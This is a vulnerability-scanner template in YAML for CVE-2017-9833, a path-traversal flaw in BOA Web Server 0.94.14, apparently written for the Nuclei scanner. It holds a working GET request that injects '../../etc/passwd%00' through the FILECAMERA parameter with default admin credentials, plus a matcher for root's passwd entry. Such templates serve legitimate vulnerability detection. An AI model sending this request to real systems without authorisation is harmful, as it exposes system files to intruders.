45 lines
1.6 KiB
YAML
45 lines
1.6 KiB
YAML
id: CVE-2017-9833
|
|
|
|
info:
|
|
name: BOA Web Server 0.94.14 - Arbitrary File Access
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
|
|
remediation: |
|
|
Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/42290
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-9833
|
|
- https://pastebin.com/raw/rt7LJvyF
|
|
- https://www.exploit-db.com/exploits/42290/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-9833
|
|
cwe-id: CWE-22
|
|
epss-score: 0.35156
|
|
epss-percentile: 0.96702
|
|
cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: boa
|
|
product: boa
|
|
tags: boa,lfr,lfi,cve,cve2017,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100a1174770e25954b2163ce8b3916d07faee7daeb46cfa1b517998dbc834c9ced5022100eb80886efd39553dbd6ffe5dcf2236a045f113dfb0089457c0b03d19ce44448b:922c64590222798bb761d5b6d8e72950
|